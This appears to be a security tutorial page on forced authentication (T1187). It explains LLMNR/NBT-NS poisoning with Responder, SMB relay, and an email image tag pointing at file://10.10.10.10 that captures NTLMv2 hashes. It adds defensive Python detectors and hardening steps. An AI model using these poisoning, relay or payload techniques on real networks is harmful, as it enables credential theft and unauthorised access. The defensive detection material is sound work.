Forced Authentication (T1187)
If you can't go to the password, make the password come to you.
1. LLMNR / NBT-NS Poisoning
When a computer looks up a hostname such as PrintSrv and DNS fails (for example because of a typo), it falls back to LLMNR/NBT-NS and broadcasts to the local network: "Who is PrintSrv?".
- Tool: Responder.
- Action: You answer "I am PrintSrv!".
- Result: The victim authenticates to you and you capture their NTLMv2 response (the "hash").
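A defender's counterpart to the poisoning step above is a canary: ask the segment for a hostname that cannot exist and treat any answer as a poisoner. The following is an added example, not code from the page or from Responder; it builds the LLMNR query from the RFC 4795 message format, parses answers, and carries a constructed reply (CANARY_NAME, SAMPLE_TXID, the 10.0.0.99 address) so the parser can be exercised offline. Only probe() touches the network.

```python
import secrets
import socket
import struct

# RFC 4795: LLMNR reuses the DNS message format over UDP multicast 224.0.0.252:5355.
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """Encode a hostname as DNS labels (length-prefixed, zero-terminated)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(data: bytes, offset: int, depth: int = 0) -> tuple[str, int]:
    """Decode labels at *offset*, following compression pointers; return (name, next offset)."""
    if depth > 5:
        raise ValueError("pointer loop")  # hostile packets may point at themselves
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:
            pointer = struct.unpack_from("!H", data, offset)[0] & 0x3FFF
            tail, _ = decode_name(data, pointer, depth + 1)
            labels.append(tail)
            return ".".join(labels), offset + 2
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def build_query(name: str, txid: int) -> bytes:
    """A standard LLMNR query: header with QDCOUNT=1, one question for an A record, class IN."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def parse_response(data: bytes, txid: int, name: str) -> list[str]:
    """Return the IPv4 addresses a reply claims for *name*; [] if it is not a valid answer to *txid*."""
    if len(data) < 12:
        return []
    rid, flags, qdcount, ancount, _, _ = struct.unpack_from("!HHHHHH", data, 0)
    if rid != txid or not (flags & 0x8000):  # must echo our ID and carry the QR (response) bit
        return []
    try:
        offset = 12
        for _ in range(qdcount):
            _, offset = decode_name(data, offset)
            offset += 4  # skip QTYPE + QCLASS
        claimed = []
        for _ in range(ancount):
            rname, offset = decode_name(data, offset)
            rtype, rclass, _ttl, rdlen = struct.unpack_from("!HHIH", data, offset)
            offset += 10
            rdata = data[offset:offset + rdlen]
            offset += rdlen
            # A record, class IN (top bit masked off), for the name we asked about
            if rtype == 1 and (rclass & 0x7FFF) == 1 and rdlen == 4 and rname.lower() == name.lower():
                claimed.append(socket.inet_ntoa(rdata))
        return claimed
    except (IndexError, struct.error, ValueError):
        return []  # truncated or malformed: not a usable answer


def probe(name: str = "", timeout: float = 2.0) -> list[tuple[str, str]]:
    """Query a name that must not exist and collect every answer (needs a network interface).
    On a clean segment this returns [] because nobody owns the name; each entry is
    (address the reply came from, address the reply claims the name resolves to)."""
    name = name or f"canary-{secrets.token_hex(4)}"
    txid = secrets.randbelow(0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)  # stay on the local segment
    sock.settimeout(timeout)
    poisoners = []
    try:
        sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _port) = sock.recvfrom(2048)
            for claimed in parse_response(data, txid, name):
                poisoners.append((src, claimed))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return poisoners


# Constructed sample: a poisoner's reply to a query (ID 0x1234) for a name that does not exist.
CANARY_NAME = "canary-no-such-host"
SAMPLE_TXID = 0x1234
SAMPLE_POISONED_REPLY = (
    struct.pack("!HHHHHH", SAMPLE_TXID, 0x8000, 1, 1, 0, 0)
    + encode_name(CANARY_NAME) + struct.pack("!HH", 1, 1)
    + encode_name(CANARY_NAME) + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton("10.0.0.99")
)

if __name__ == "__main__":
    print("sample reply parsed as:", parse_response(SAMPLE_POISONED_REPLY, SAMPLE_TXID, CANARY_NAME))
    for src, claimed in probe():
        print(f"ALERT: {src} answered a query for a non-existent name (claims it is {claimed})")
```

Run it periodically from a sensor on each VLAN; a random name per probe stops a poisoner from learning to ignore the canary. The lasting fix is to disable LLMNR (the EnableMulticast DNS client policy) and NetBIOS over TCP/IP on the endpoints, which removes the fallback the page describes.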
2. SMB Relay
Captured NTLMv2 responses cannot be used for Pass-the-Hash, but they can be relayed in real time.
- Requirement: SMB Signing is not required on the target (the default on workstations; domain controllers require it).
- Attack:
  - Victim connects to you (via LLMNR poisoning).
  - You forward the auth request to Target-PC. Target-PC accepts it. You get a shell on Target-PC.
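On the target, a relayed logon shows up as a normal NTLM network logon (event 4624, logon type 3), but the event carries the victim's workstation name next to the relaying host's IP address, because the NTLM messages are forwarded unchanged. The check below is an added example, not code from the page; it runs that heuristic over constructed events against a constructed inventory (hostnames WS01, WS02, PRINTSRV and their addresses are assumptions).

```python
from dataclasses import dataclass

# Constructed asset inventory: hostname -> address the host is expected to log on from.
# In practice this comes from DHCP leases, the CMDB or DNS; NAT and VPN ranges need allow-listing.
INVENTORY = {
    "WS01": "10.10.1.21",
    "WS02": "10.10.1.22",
    "PRINTSRV": "10.10.1.50",
}

# Constructed 4624 (successful logon) events, reduced to the fields the check uses.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "alice", "WorkstationName": "WS01", "IpAddress": "10.10.1.21"},
    # WS02's credentials arrive from an address that is not WS02: the relay pattern.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "bob", "WorkstationName": "WS02", "IpAddress": "10.10.1.200"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "carol", "WorkstationName": "WS01", "IpAddress": "10.10.1.21"},
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "dave", "WorkstationName": "WS01", "IpAddress": "-"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "erin", "WorkstationName": "WS99", "IpAddress": "10.10.1.77"},
]


@dataclass(frozen=True)
class Finding:
    user: str
    workstation: str
    source_ip: str
    reason: str


def find_relay_candidates(events, inventory) -> list[Finding]:
    """Flag NTLM network logons whose claimed workstation does not match the source address.

    The workstation name is attacker-influenced, so a hit is a lead for triage, not proof;
    the inventory mismatch is what makes it worth a look."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue  # Kerberos logons cannot be relayed this way
        workstation = str(ev.get("WorkstationName", "-")).upper()
        source_ip = str(ev.get("IpAddress", "-"))
        if workstation == "-" or source_ip in ("-", "127.0.0.1", "::1"):
            continue  # no usable pair to compare
        expected = inventory.get(workstation)
        if expected is None:
            findings.append(Finding(ev["TargetUserName"], workstation, source_ip,
                                    "workstation not in inventory"))
        elif expected != source_ip:
            findings.append(Finding(ev["TargetUserName"], workstation, source_ip,
                                    f"inventory says {workstation} is {expected}"))
    return findings


if __name__ == "__main__":
    for f in find_relay_candidates(SAMPLE_EVENTS, INVENTORY):
        print(f"possible relay: user={f.user} claims={f.workstation} from={f.source_ip} ({f.reason})")
```

The detection only narrows the search; the fix for the requirement stated above is to require SMB signing on every server that accepts NTLM (on Windows, Set-SmbServerConfiguration -RequireSecuritySignature $true), which makes the relayed session unusable even when the authentication itself succeeds.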
3. Web Source Code
Include an image tag in an email: <img src="file://10.10.10.10/logo.png">.
- When the user opens the email (for example in Outlook), the client tries to fetch the image over SMB and authenticates to your share. You capture the NTLMv2 response.
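A mail gateway or content filter can catch this before a client ever renders it: any automatically fetched reference that points at a UNC path or a file: URL with a host component will make a Windows client speak SMB. The scanner below is an added example, not code from the page; it walks the HTML with the standard library parser over a constructed message body (the example.com and fileserver references are assumptions; the file://10.10.10.10 image is the pattern from the text above).

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes whose value a client fetches automatically (or on click, for href/action).
FETCHING_ATTRS = {"src", "href", "background", "data", "poster", "action"}


def is_smb_trigger(ref: str) -> bool:
    """True if following *ref* would make a Windows client open an SMB connection."""
    ref = ref.strip()
    if ref.startswith("\\\\"):  # UNC path: \\host\share\...
        return True
    parts = urlsplit(ref)
    scheme = parts.scheme.lower()
    if scheme == "file":
        # file:///C:/x is local; file://host/x is remote; file:////host/share is a UNC in URL form
        return parts.netloc not in ("", "localhost") or parts.path.startswith("//")
    return scheme in ("smb", "cifs")


class RemoteRefScanner(HTMLParser):
    """Collect (tag, attribute, value) for every reference that would trigger SMB."""

    def __init__(self):
        super().__init__()
        self.findings: list[tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):  # also reached for <img .../> via handle_startendtag
        for name, value in attrs:
            if value and name.lower() in FETCHING_ATTRS and is_smb_trigger(value):
                self.findings.append((tag, name.lower(), value))


def scan_html(body: str) -> list[tuple[str, str, str]]:
    """Return every SMB-triggering reference found in an HTML body."""
    scanner = RemoteRefScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


# Constructed message body mixing harmless and SMB-triggering references.
SAMPLE_BODY = """<html><body>
<p>Quarterly figures attached.</p>
<img src="https://example.com/logo.png" alt="logo">
<img src="file://10.10.10.10/logo.png">
<a href="\\\\fileserver\\share\\report.pdf">report</a>
<img src="file:///C:/Users/Public/local.png">
</body></html>"""

if __name__ == "__main__":
    for tag, attr, value in scan_html(SAMPLE_BODY):
        print(f"quarantine: <{tag} {attr}={value!r}> would force SMB authentication")
```

Filtering the message is one layer; the other is the network, where outbound TCP 445 to the internet should be blocked at the edge so that a reference which slips through cannot reach the listener at all.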